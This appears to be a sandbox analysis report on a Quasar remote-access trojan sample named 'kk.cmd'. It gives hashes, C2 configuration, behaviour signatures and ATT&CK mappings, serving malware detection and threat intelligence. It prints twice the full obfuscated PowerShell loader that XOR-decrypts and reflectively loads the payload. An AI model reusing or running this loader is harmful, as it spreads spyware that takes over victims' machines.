quasar | 9c3d53c7723bfdd037df85de4c26efcd5e6f4ad58cc24f7a38a774bf22de3876

General

Target

kk.cmd
Size

4.2MB
MD5

dd89f166318c7640673dc83253874f85
SHA1

c6d10f65f6ff4df23404ac521f1d3db79264657e
SHA256

9c3d53c7723bfdd037df85de4c26efcd5e6f4ad58cc24f7a38a774bf22de3876
SHA512

c2c61f22626a862ad4622c98473ef62453e8c0f966e9a8f811f2ff3151af424215bab527a21fe3d7f7de44e674a2f116edc915e5774817acb401980ab27fcda5
SSDEEP

49152:r2wTjdVohnHVy2BvdhqhKFLHVr1vpvnIALaU8:J

Score

10^/10

quasar kdot execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

kdot

C2

captchacdn.com:7000

Mutex

989fc24d-b096-453b-836b-1510c023cb6a

Attributes

encryption_key
608C2EF7FA3C5E6905B737821BA5F1BF71A72757
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/536-19-0x000001ABA5640000-0x000001ABA5964000-memory.dmp	family_quasar

Blocklisted process makes network request 6 IoCs

flow	pid	Process
17	536	powershell.exe
33	536	powershell.exe
40	536	powershell.exe
43	536	powershell.exe
50	536	powershell.exe
51	536	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
536	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
536	powershell.exe
536	powershell.exe
536	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	536	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
536	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 5020 wrote to memory of 1576	5020	cmd.exe	84
PID 5020 wrote to memory of 1576	5020	cmd.exe	84
PID 1576 wrote to memory of 536	1576	conhost.exe	85
PID 1576 wrote to memory of 536	1576	conhost.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\kk.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:5020
- C:\Windows\system32\conhost.exe
  conhost --headless powershell -nop -w hidden -c " $kdot_file='C:\Users\Admin\AppData\Local\Temp\kk.cmd';${`KdotgWed`WfojJw} = .([char]((13 - 1378 - 3780 + 5216))+[char](((4676 -Band 1964) + (4676 -Bor 1964) + 3244 - 9783))+[char]((10304 - 110 - 501 - 9577))+[char](((-15629 -Band 8806) + (-15629 -Bor 8806) + 5769 + 1099))+[char]((7825 - 8014 - 2335 + 2591))+[char](((-5358 -Band 8947) + (-5358 -Bor 8947) - 8209 + 4731))+[char]((18347 - 9370 - 2385 - 6482))+[char]((15441 - 1573 - 3971 - 9781))+[char](((-16233 -Band 2524) + (-16233 -Bor 2524) + 6390 + 7420))+[char](((-9714 -Band 5556) + (-9714 -Bor 5556) - 42 + 4310))+[char](((-739 -Band 7118) + (-739 -Bor 7118) + 358 - 6621))) $Kdot_fIle -Raw;${kd`OtyMlvypznrx} = ([System.texT.eNcODiNG]::UtF8.GetStRIng((0x48, 0x4b, 67, 0x55, 0x3a, 92, 83, 0x6f, 0x66, 116, 119, 0x61, 0x72, 0x65, 0x5c, 0x43, 0x68, 0x72, 111, 109)) + [SYstem.TexT.eNCOdIng]::utF8.GETsTrInG((101, 85, 112, 100, 97, 116, 101)));if (-not (.([char](((-11673 -Band 6638) + (-11673 -Bor 6638) - 1202 + 6321))+[char]((11389 - 5688 + 2237 - 7837))+[char](((4283 -Band 7213) + (4283 -Bor 7213) - 6589 - 4792))+[char]((-7138 - 7728 + 9322 + 5660))+[char]((-1708 - 2423 + 9091 - 4915))+[char](((-1052 -Band 3453) + (-1052 -Bor 3453) - 6782 + 4461))+[char]((8989 - 6838 - 4852 + 2798))+[char](((2556 -Band 2244) + (2556 -Bor 2244) + 4520 - 9204))+[char]((3135 - 8793 + 4478 + 1284))) ${kd`Otym`LvYpZnrx})) { .([char](((6306 -Band 1379) + (6306 -Bor 1379) + 1030 - 8637))+[char]((4345 - 8871 - 5118 + 9745))+[char]((11644 - 9472 + 415 - 2468))+[char]((-4904 - 8931 + 6266 + 7614))+[char](((1636 -Band 9043) + (1636 -Bor 9043) - 7129 - 3477))+[char]((2317 - 8117 + 6579 - 663))+[char](((-8980 -Band 9997) + (-8980 -Bor 9997) + 6956 - 7872))+[char](((-5852 -Band 9977) + (-5852 -Bor 9977) - 6312 + 2296))) -Path ${kdOt`Ymlv`Ypznrx} -Force };1..3 | .([char]((13652 - 3627 - 164 - 9824))) {.([char]((-11298 - 1866 + 3254 + 9993))+[char](((-1551 -Band 5849) + (-1551 -Bor 5849) + 4465 - 8662))+[char]((-5499 - 7553 + 7140 + 6028))+[char](((1649 -Band 7342) + (1649 -Bor 7342) - 4704 - 4242))+[char]((-3070 - 3172 + 5411 + 904))+[char]((7010 - 5201 + 7155 - 8848))+[char](((-11871 -Band 2986) + (-11871 -Bor 2986) + 9632 - 646))+[char]((412 - 5856 + 5980 - 427))+[char](((4457 -Band 7882) + (4457 -Bor 7882) - 7084 - 5175))+[char]((6474 - 8821 + 2738 - 277))+[char](((-12218 -Band 6766) + (-12218 -Bor 6766) + 7285 - 1722))+[char](((-10210 -Band 6774) + (-10210 -Bor 6774) + 8883 - 5335))+[char](((6092 -Band 3541) + (6092 -Bor 3541) - 3025 - 6507))+[char](((-16166 -Band 7383) + (-16166 -Bor 7383) + 9786 - 889))+[char]((3038 - 9578 + 1566 + 5090))+[char](((6145 -Band 7511) + (6145 -Bor 7511) - 6325 - 7210))) -Path ${kdOtYMlvyPznrx} -Name (([SysteM.TexT.ENcodinG]::UTf8.GEtsTRINg((75, 0x44, 0x4f)) + [system.teXt.EncODiNG]::UTF8.GetStRIng([SySTem.cONVert]::FroMbASe64StRING('VA==')))+$_) -Value (${`K`DoTg`WeDWf`Ojjw} | .([char](((-14443 -Band 7542) + (-14443 -Bor 7542) + 2962 + 4022))+[char]((16547 - 3435 - 9446 - 3565))+[char](((5939 -Band 951) + (5939 -Bor 951) - 603 - 6179))+[char]((25941 - 9295 - 7714 - 8831))+[char](((-14658 -Band 1515) + (-14658 -Bor 1515) + 6571 + 6671))+[char](((-6324 -Band 2857) + (-6324 -Bor 2857) - 32 + 3615))+[char](((15470 -Band 479) + (15470 -Bor 479) - 8463 - 7441))+[char](((4576 -Band 3834) + (4576 -Bor 3834) + 764 - 9091))+[char](((-12277 -Band 6674) + (-12277 -Bor 6674) - 1246 + 6965))+[char]((-2008 - 2344 + 4447 + 19))+[char](((7728 -Band 5699) + (7728 -Bor 5699) - 8958 - 4364))+[char](((-1171 -Band 8519) + (-1171 -Bor 8519) - 285 - 6953))+[char]((1491 - 849 - 5289 + 4750))) -Pattern (([sYStEm.TexT.enCODInG]::UTF8.GEtSTrInG((58, 0x4b, 68)) + [SysTeM.tExt.eNCOdIng]::uTf8.GeTSTRiNG((0x4f, 0x54)))+$_+([sysTEm.Text.ENCodInG]::utF8.GetsTriNG((0x3a, 0x3a, 0x28)) + [sYstEm.tEXT.enCodIng]::UTf8.gETStrInG((46, 42)) + [sYSTeM.teXT.eNcoDiNg]::UtF8.GetStRing((0x29))))).matCHEs.gRoUPs[1].vAluE -Force};.([char]((934 - 8315 + 4511 + 2953))+[char]((6910 - 9015 + 9487 - 7281))+[char]((8374 - 9248 + 9141 - 8151))+[char](((9002 -Band 3523) + (9002 -Bor 3523) - 9834 - 2646))+[char](((3172 -Band 7600) + (3172 -Bor 7600) - 1242 - 9457))+[char](((174 -Band 7378) + (174 -Bor 7378) - 7613 + 177))+[char](((-22737 -Band 7186) + (-22737 -Bor 7186) + 9850 + 5802))+[char](((-13731 -Band 671) + (-13731 -Bor 671) + 4826 + 8343))+[char](((-13519 -Band 9113) + (-13519 -Bor 9113) + 338 + 4148))+[char](((-12650 -Band 4594) + (-12650 -Bor 4594) - 971 + 9141))+[char](((6095 -Band 3270) + (6095 -Bor 3270) - 6816 - 2438))+[char]((22276 - 8612 - 3677 - 9875))+[char]((3860 - 7729 + 5642 - 1672))+[char](((3457 -Band 2667) + (3457 -Bor 2667) - 9936 + 3926))+[char]((9435 - 551 - 9637 + 869))+[char](((5027 -Band 6422) + (5027 -Bor 6422) - 9585 - 1743))) -Path ${kdotYmlvYpznrx} -Name ([SyStem.TeXT.ENCODinG]::utF8.GeTsTriNG([sysTem.CoNverT]::FROMbASe64STRing('S0RP')) + [SyStem.TEXt.enCodING]::utF8.GetStRINg((0x54, 0x34))) -Value ([sySTEm.teXt.encODINg]::uTF8.GeTsTRiNG((0x7a, 0x39, 0x61, 0x4d, 0x6c, 0x35, 0x57, 0x44, 0x43, 0x55, 0x4f, 0x6b, 0x37, 0x42, 0x4e, 0x34))) -Force;${KdOt`MjQ`N`VwecpW} = [SyStem.Text.eNcoDing]::UTf8.GEtbyTES((.([char]((14702 - 6998 + 113 - 7746))+[char](((8253 -Band 2702) + (8253 -Bor 2702) - 4927 - 5927))+[char](((-7844 -Band 9851) + (-7844 -Bor 9851) - 2777 + 886))+[char]((-13280 - 2082 + 8548 + 6859))+[char](((-8699 -Band 9563) + (-8699 -Bor 9563) + 4687 - 5478))+[char]((878 - 896 - 302 + 436))+[char]((11225 - 3972 - 7490 + 338))+[char]((-5341 - 8147 + 4227 + 9370))+[char]((-7848 - 4210 + 4385 + 7753))+[char]((-2173 - 968 + 691 + 2564))+[char](((-22715 -Band 9259) + (-22715 -Bor 9259) + 3653 + 9914))+[char](((-5947 -Band 5212) + (-5947 -Bor 5212) - 237 + 1084))+[char]((6804 - 243 - 6867 + 407))+[char](((-103 -Band 1345) + (-103 -Bor 1345) - 1654 + 526))+[char](((-2605 -Band 4830) + (-2605 -Bor 4830) - 9666 + 7557))+[char]((12848 - 7662 - 9177 + 4112))) -Path ${KdOtym`Lvy`P`Znrx} KDOT4).kDOT4);${KDOtnpTIeKZsez} = [conVert]::fRoMbase64StRInG((.([char]((4388 - 7071 + 2774 - 20))+[char]((1699 - 9928 - 1346 + 9676))+[char](((2716 -Band 723) + (2716 -Bor 723) + 335 - 3658))+[char](((9601 -Band 1692) + (9601 -Bor 1692) - 7558 - 3690))+[char]((8426 - 3054 - 6911 + 1612))+[char]((-6327 - 4578 + 8457 + 2564))+[char](((-16629 -Band 7610) + (-16629 -Bor 7610) + 8111 + 1009))+[char](((-12364 -Band 5587) + (-12364 -Bor 5587) + 1664 + 5222))+[char]((10883 - 3871 - 3704 - 3228))+[char]((10287 - 1089 - 822 - 8262))+[char](((5500 -Band 5314) + (5500 -Bor 5314) - 5527 - 5176))+[char]((20237 - 8692 - 5360 - 6073))+[char](((56 -Band 2560) + (56 -Bor 2560) - 3107 + 592))+[char](((-1619 -Band 4538) + (-1619 -Bor 4538) - 6034 + 3229))+[char]((-10383 - 624 + 2341 + 8782))+[char](((-15145 -Band 6387) + (-15145 -Bor 6387) + 8799 + 80))) -Path ${kDotYMLvYpznrX} KDOT1).kDOT1);${kdOtaelspVrPCf} = [byTE[]]::NEW(${KDotnPTiek`ZSez}.LenGTH);for (${KDO`TvByytHcxDm}=0;${`KdotvB`Yyth`CxDm} -lt ${kDoTnptIEkzSez}.LengTH;${KdoTvb`YYtHc`Xd`M}++) {${kdOt`AelSp`VrpCf}[${kdOtvBYythcXdm}]=${`KdO`TnPT`I`Ekz`SEZ}[${`Kd`OtvbY`YtH`CxDm}] -bxor ${Kdot`Mj`Qnv`Wec`PW}[${kDoTvbyYthCX`Dm} % ${KDOtMJqNVwecp`W}.LeNGth]};[sySTEm.REFlECTiOn.ASsEmBLy]::LOaD(${`KdOtae`LsPvr`P`Cf}).eNTrYPoiNt.INvoKE($null,@(,[string[]]@()))"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -nop -w hidden -c " $kdot_file='C:\Users\Admin\AppData\Local\Temp\kk.cmd';${`KdotgWed`WfojJw} = .([char]((13 - 1378 - 3780 + 5216))+[char](((4676 -Band 1964) + (4676 -Bor 1964) + 3244 - 9783))+[char]((10304 - 110 - 501 - 9577))+[char](((-15629 -Band 8806) + (-15629 -Bor 8806) + 5769 + 1099))+[char]((7825 - 8014 - 2335 + 2591))+[char](((-5358 -Band 8947) + (-5358 -Bor 8947) - 8209 + 4731))+[char]((18347 - 9370 - 2385 - 6482))+[char]((15441 - 1573 - 3971 - 9781))+[char](((-16233 -Band 2524) + (-16233 -Bor 2524) + 6390 + 7420))+[char](((-9714 -Band 5556) + (-9714 -Bor 5556) - 42 + 4310))+[char](((-739 -Band 7118) + (-739 -Bor 7118) + 358 - 6621))) $Kdot_fIle -Raw;${kd`OtyMlvypznrx} = ([System.texT.eNcODiNG]::UtF8.GetStRIng((0x48, 0x4b, 67, 0x55, 0x3a, 92, 83, 0x6f, 0x66, 116, 119, 0x61, 0x72, 0x65, 0x5c, 0x43, 0x68, 0x72, 111, 109)) + [SYstem.TexT.eNCOdIng]::utF8.GETsTrInG((101, 85, 112, 100, 97, 116, 101)));if (-not (.([char](((-11673 -Band 6638) + (-11673 -Bor 6638) - 1202 + 6321))+[char]((11389 - 5688 + 2237 - 7837))+[char](((4283 -Band 7213) + (4283 -Bor 7213) - 6589 - 4792))+[char]((-7138 - 7728 + 9322 + 5660))+[char]((-1708 - 2423 + 9091 - 4915))+[char](((-1052 -Band 3453) + (-1052 -Bor 3453) - 6782 + 4461))+[char]((8989 - 6838 - 4852 + 2798))+[char](((2556 -Band 2244) + (2556 -Bor 2244) + 4520 - 9204))+[char]((3135 - 8793 + 4478 + 1284))) ${kd`Otym`LvYpZnrx})) { .([char](((6306 -Band 1379) + (6306 -Bor 1379) + 1030 - 8637))+[char]((4345 - 8871 - 5118 + 9745))+[char]((11644 - 9472 + 415 - 2468))+[char]((-4904 - 8931 + 6266 + 7614))+[char](((1636 -Band 9043) + (1636 -Bor 9043) - 7129 - 3477))+[char]((2317 - 8117 + 6579 - 663))+[char](((-8980 -Band 9997) + (-8980 -Bor 9997) + 6956 - 7872))+[char](((-5852 -Band 9977) + (-5852 -Bor 9977) - 6312 + 2296))) -Path ${kdOt`Ymlv`Ypznrx} -Force };1..3 | .([char]((13652 - 3627 - 164 - 9824))) {.([char]((-11298 - 1866 + 3254 + 9993))+[char](((-1551 -Band 5849) + (-1551 -Bor 5849) + 4465 - 8662))+[char]((-5499 - 7553 + 7140 + 6028))+[char](((1649 -Band 7342) + (1649 -Bor 7342) - 4704 - 4242))+[char]((-3070 - 3172 + 5411 + 904))+[char]((7010 - 5201 + 7155 - 8848))+[char](((-11871 -Band 2986) + (-11871 -Bor 2986) + 9632 - 646))+[char]((412 - 5856 + 5980 - 427))+[char](((4457 -Band 7882) + (4457 -Bor 7882) - 7084 - 5175))+[char]((6474 - 8821 + 2738 - 277))+[char](((-12218 -Band 6766) + (-12218 -Bor 6766) + 7285 - 1722))+[char](((-10210 -Band 6774) + (-10210 -Bor 6774) + 8883 - 5335))+[char](((6092 -Band 3541) + (6092 -Bor 3541) - 3025 - 6507))+[char](((-16166 -Band 7383) + (-16166 -Bor 7383) + 9786 - 889))+[char]((3038 - 9578 + 1566 + 5090))+[char](((6145 -Band 7511) + (6145 -Bor 7511) - 6325 - 7210))) -Path ${kdOtYMlvyPznrx} -Name (([SysteM.TexT.ENcodinG]::UTf8.GEtsTRINg((75, 0x44, 0x4f)) + [system.teXt.EncODiNG]::UTF8.GetStRIng([SySTem.cONVert]::FroMbASe64StRING('VA==')))+$_) -Value (${`K`DoTg`WeDWf`Ojjw} | .([char](((-14443 -Band 7542) + (-14443 -Bor 7542) + 2962 + 4022))+[char]((16547 - 3435 - 9446 - 3565))+[char](((5939 -Band 951) + (5939 -Bor 951) - 603 - 6179))+[char]((25941 - 9295 - 7714 - 8831))+[char](((-14658 -Band 1515) + (-14658 -Bor 1515) + 6571 + 6671))+[char](((-6324 -Band 2857) + (-6324 -Bor 2857) - 32 + 3615))+[char](((15470 -Band 479) + (15470 -Bor 479) - 8463 - 7441))+[char](((4576 -Band 3834) + (4576 -Bor 3834) + 764 - 9091))+[char](((-12277 -Band 6674) + (-12277 -Bor 6674) - 1246 + 6965))+[char]((-2008 - 2344 + 4447 + 19))+[char](((7728 -Band 5699) + (7728 -Bor 5699) - 8958 - 4364))+[char](((-1171 -Band 8519) + (-1171 -Bor 8519) - 285 - 6953))+[char]((1491 - 849 - 5289 + 4750))) -Pattern (([sYStEm.TexT.enCODInG]::UTF8.GEtSTrInG((58, 0x4b, 68)) + [SysTeM.tExt.eNCOdIng]::uTf8.GeTSTRiNG((0x4f, 0x54)))+$_+([sysTEm.Text.ENCodInG]::utF8.GetsTriNG((0x3a, 0x3a, 0x28)) + [sYstEm.tEXT.enCodIng]::UTf8.gETStrInG((46, 42)) + [sYSTeM.teXT.eNcoDiNg]::UtF8.GetStRing((0x29))))).matCHEs.gRoUPs[1].vAluE -Force};.([char]((934 - 8315 + 4511 + 2953))+[char]((6910 - 9015 + 9487 - 7281))+[char]((8374 - 9248 + 9141 - 8151))+[char](((9002 -Band 3523) + (9002 -Bor 3523) - 9834 - 2646))+[char](((3172 -Band 7600) + (3172 -Bor 7600) - 1242 - 9457))+[char](((174 -Band 7378) + (174 -Bor 7378) - 7613 + 177))+[char](((-22737 -Band 7186) + (-22737 -Bor 7186) + 9850 + 5802))+[char](((-13731 -Band 671) + (-13731 -Bor 671) + 4826 + 8343))+[char](((-13519 -Band 9113) + (-13519 -Bor 9113) + 338 + 4148))+[char](((-12650 -Band 4594) + (-12650 -Bor 4594) - 971 + 9141))+[char](((6095 -Band 3270) + (6095 -Bor 3270) - 6816 - 2438))+[char]((22276 - 8612 - 3677 - 9875))+[char]((3860 - 7729 + 5642 - 1672))+[char](((3457 -Band 2667) + (3457 -Bor 2667) - 9936 + 3926))+[char]((9435 - 551 - 9637 + 869))+[char](((5027 -Band 6422) + (5027 -Bor 6422) - 9585 - 1743))) -Path ${kdotYmlvYpznrx} -Name ([SyStem.TeXT.ENCODinG]::utF8.GeTsTriNG([sysTem.CoNverT]::FROMbASe64STRing('S0RP')) + [SyStem.TEXt.enCodING]::utF8.GetStRINg((0x54, 0x34))) -Value ([sySTEm.teXt.encODINg]::uTF8.GeTsTRiNG((0x7a, 0x39, 0x61, 0x4d, 0x6c, 0x35, 0x57, 0x44, 0x43, 0x55, 0x4f, 0x6b, 0x37, 0x42, 0x4e, 0x34))) -Force;${KdOt`MjQ`N`VwecpW} = [SyStem.Text.eNcoDing]::UTf8.GEtbyTES((.([char]((14702 - 6998 + 113 - 7746))+[char](((8253 -Band 2702) + (8253 -Bor 2702) - 4927 - 5927))+[char](((-7844 -Band 9851) + (-7844 -Bor 9851) - 2777 + 886))+[char]((-13280 - 2082 + 8548 + 6859))+[char](((-8699 -Band 9563) + (-8699 -Bor 9563) + 4687 - 5478))+[char]((878 - 896 - 302 + 436))+[char]((11225 - 3972 - 7490 + 338))+[char]((-5341 - 8147 + 4227 + 9370))+[char]((-7848 - 4210 + 4385 + 7753))+[char]((-2173 - 968 + 691 + 2564))+[char](((-22715 -Band 9259) + (-22715 -Bor 9259) + 3653 + 9914))+[char](((-5947 -Band 5212) + (-5947 -Bor 5212) - 237 + 1084))+[char]((6804 - 243 - 6867 + 407))+[char](((-103 -Band 1345) + (-103 -Bor 1345) - 1654 + 526))+[char](((-2605 -Band 4830) + (-2605 -Bor 4830) - 9666 + 7557))+[char]((12848 - 7662 - 9177 + 4112))) -Path ${KdOtym`Lvy`P`Znrx} KDOT4).kDOT4);${KDOtnpTIeKZsez} = [conVert]::fRoMbase64StRInG((.([char]((4388 - 7071 + 2774 - 20))+[char]((1699 - 9928 - 1346 + 9676))+[char](((2716 -Band 723) + (2716 -Bor 723) + 335 - 3658))+[char](((9601 -Band 1692) + (9601 -Bor 1692) - 7558 - 3690))+[char]((8426 - 3054 - 6911 + 1612))+[char]((-6327 - 4578 + 8457 + 2564))+[char](((-16629 -Band 7610) + (-16629 -Bor 7610) + 8111 + 1009))+[char](((-12364 -Band 5587) + (-12364 -Bor 5587) + 1664 + 5222))+[char]((10883 - 3871 - 3704 - 3228))+[char]((10287 - 1089 - 822 - 8262))+[char](((5500 -Band 5314) + (5500 -Bor 5314) - 5527 - 5176))+[char]((20237 - 8692 - 5360 - 6073))+[char](((56 -Band 2560) + (56 -Bor 2560) - 3107 + 592))+[char](((-1619 -Band 4538) + (-1619 -Bor 4538) - 6034 + 3229))+[char]((-10383 - 624 + 2341 + 8782))+[char](((-15145 -Band 6387) + (-15145 -Bor 6387) + 8799 + 80))) -Path ${kDotYMLvYpznrX} KDOT1).kDOT1);${kdOtaelspVrPCf} = [byTE[]]::NEW(${KDotnPTiek`ZSez}.LenGTH);for (${KDO`TvByytHcxDm}=0;${`KdotvB`Yyth`CxDm} -lt ${kDoTnptIEkzSez}.LengTH;${KdoTvb`YYtHc`Xd`M}++) {${kdOt`AelSp`VrpCf}[${kdOtvBYythcXdm}]=${`KdO`TnPT`I`Ekz`SEZ}[${`Kd`OtvbY`YtH`CxDm}] -bxor ${Kdot`Mj`Qnv`Wec`PW}[${kDoTvbyYthCX`Dm} % ${KDOtMJqNVwecp`W}.LeNGth]};[sySTEm.REFlECTiOn.ASsEmBLy]::LOaD(${`KdOtae`LsPvr`P`Cf}).eNTrYPoiNt.INvoKE($null,@(,[string[]]@()))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q4pk2yhq.pek.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/536-16-0x00007FFEEDD40000-0x00007FFEEE801000-memory.dmp

Filesize
10.8MB

Download
memory/536-13-0x00007FFEEDD40000-0x00007FFEEE801000-memory.dmp

Filesize
10.8MB

Download
memory/536-17-0x000001ABA5480000-0x000001ABA54F6000-memory.dmp

Filesize
472KB

Download
memory/536-12-0x00007FFEEDD40000-0x00007FFEEE801000-memory.dmp

Filesize
10.8MB

Download
memory/536-18-0x000001ABA53D0000-0x000001ABA53EE000-memory.dmp

Filesize
120KB

Download
memory/536-14-0x000001ABA2EE0000-0x000001ABA2EE8000-memory.dmp

Filesize
32KB

Download
memory/536-15-0x000001ABA5390000-0x000001ABA539A000-memory.dmp

Filesize
40KB

Download
memory/536-19-0x000001ABA5640000-0x000001ABA5964000-memory.dmp

Filesize
3.1MB

Download
memory/536-11-0x00007FFEEDD40000-0x00007FFEEE801000-memory.dmp

Filesize
10.8MB

Download
memory/536-1-0x000001ABA2EF0000-0x000001ABA2F12000-memory.dmp

Filesize
136KB

Download
memory/536-0-0x00007FFEEDD43000-0x00007FFEEDD45000-memory.dmp

Filesize
8KB

Download
memory/536-20-0x000001ABA6160000-0x000001ABA61B0000-memory.dmp

Filesize
320KB

Download
memory/536-21-0x000001ABA6270000-0x000001ABA6322000-memory.dmp

Filesize
712KB

Download
memory/536-22-0x000001ABA6500000-0x000001ABA66C2000-memory.dmp

Filesize
1.8MB

Download
memory/536-23-0x00007FFEEDD43000-0x00007FFEEDD45000-memory.dmp

Filesize
8KB

Download
memory/536-24-0x00007FFEEDD40000-0x00007FFEEE801000-memory.dmp

Filesize
10.8MB

Download
memory/536-25-0x00007FFEEDD40000-0x00007FFEEE801000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing